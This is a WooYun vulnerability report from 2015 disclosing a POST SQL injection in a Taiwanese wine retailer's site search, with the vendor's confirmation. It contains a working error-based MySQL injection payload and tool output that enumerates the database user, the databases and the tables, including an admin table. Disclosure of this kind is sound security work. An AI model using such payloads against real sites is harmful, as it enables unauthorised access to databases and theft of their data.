当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0165702

漏洞标题:夏朵菸酒主站post注入(涉及79表)(臺灣地區)

相关厂商:夏朵菸酒股份有限公司

漏洞作者: 路人甲

提交时间:2015-12-29 17:11

修复时间:2016-02-12 18:49

公开时间:2016-02-12 18:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-29: 细节已通知厂商并且等待厂商处理中
2015-12-31: 厂商已经确认,细节仅向厂商公开
2016-01-10: 细节向核心白帽子及相关领域专家公开
2016-01-20: 细节向普通白帽子公开
2016-01-30: 细节向实习白帽子公开
2016-02-12: 细节向公众公开

简要描述:

夏朵成立於1999年12月,至今已有14.5歲了,「夏朵」一個聽起來很女性也很法國的名字,沒錯!夏朵是由法文”Chateaux”(酒堡)直譯而來。一開始是由三位愛好葡萄酒文化的資深女業務所共同組成的,現在大部分的員工都是股東,業務員全是女性而且在葡萄酒界皆有15年以上的經驗。我們以銷售法國級數酒著稱,我們很驕傲地說:在頂級酒這塊市場上「夏朵」佔有一席很重要之地位,這要歸功於我們專業的團隊與支持我們的客戶群

详细说明:

站点:

http://**.**.**.**/


在搜索处存在post注入
抓包:

POST /search.php HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/search.php
Cookie: PHPSESSID=c73a78dc58fd5819b08078c04d627c9d
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
keyword=1&Searchtype=1&button=%E9%80%81%E5%87%BA


数据:

Place: POST
Parameter: keyword
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: keyword=1' AND (SELECT 7441 FROM(SELECT COUNT(*),CONCAT(0x3a7272633
a,(SELECT (CASE WHEN (7441=7441) THEN 1 ELSE 0 END)),0x3a7471643a,FLOOR(RAND(0)*
2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'NarQ'='NarQ&Searc
htype=1&button=??
---
[11:48:37] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0
[11:48:37] [INFO] fetching current user
[11:48:38] [INFO] retrieved: xuaetahc_web@localhost
current user:    'xuaetahc_web@localhost'


available databases [2]:
[*] information_schema
[*] xuaetahc_webdb


Database: xuaetahc_webdb
[14 tables]
+---------------------------------------+
| pro_brand                             |
| pro_cate                              |
| pro_formula                           |
| pro_level                             |
| pro_nation                            |
| pro_product                           |
| pro_region                            |
| pro_type                              |
| pro_v2p                               |
| pro_vendor                            |
| tbadmin                               |
| tbconposter                           |
| tbcontype                             |
| tbdealers                             |
+---------------------------------------+
Database: information_schema
[65 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| CLIENT_STATISTICS                     |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_TEMPORARY_TABLES               |
| GLOBAL_VARIABLES                      |
| INDEX_STATISTICS                      |
| INNODB_BUFFER_PAGE                    |
| INNODB_BUFFER_PAGE_LRU                |
| INNODB_BUFFER_POOL_PAGES              |
| INNODB_BUFFER_POOL_PAGES_BLOB         |
| INNODB_BUFFER_POOL_PAGES_INDEX        |
| INNODB_BUFFER_POOL_STATS              |
| INNODB_CHANGED_PAGES                  |
| INNODB_CMP                            |
| INNODB_CMPMEM                         |
| INNODB_CMPMEM_RESET                   |
| INNODB_CMP_RESET                      |
| INNODB_INDEX_STATS                    |
| INNODB_LOCKS                          |
| INNODB_LOCK_WAITS                     |
| INNODB_RSEG                           |
| INNODB_SYS_COLUMNS                    |
| INNODB_SYS_FIELDS                     |
| INNODB_SYS_FOREIGN                    |
| INNODB_SYS_FOREIGN_COLS               |
| INNODB_SYS_INDEXES                    |
| INNODB_SYS_STATS                      |
| INNODB_SYS_TABLES                     |
| INNODB_SYS_TABLESTATS                 |
| INNODB_TABLE_STATS                    |
| INNODB_TRX                            |
| INNODB_UNDO_LOGS                      |
| KEY_COLUMN_USAGE                      |
| PARAMETERS                            |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| QUERY_RESPONSE_TIME                   |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLESPACES                           |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TABLE_STATISTICS                      |
| TEMPORARY_TABLES                      |
| THREAD_STATISTICS                     |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| USER_STATISTICS                       |
| VIEWS                                 |
| XTRADB_ADMIN_COMMAND                  |
+---------------------------------------+


漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-12-31 02:02

厂商回复:

感謝通報

最新状态:

暂无

漏洞评价:

评价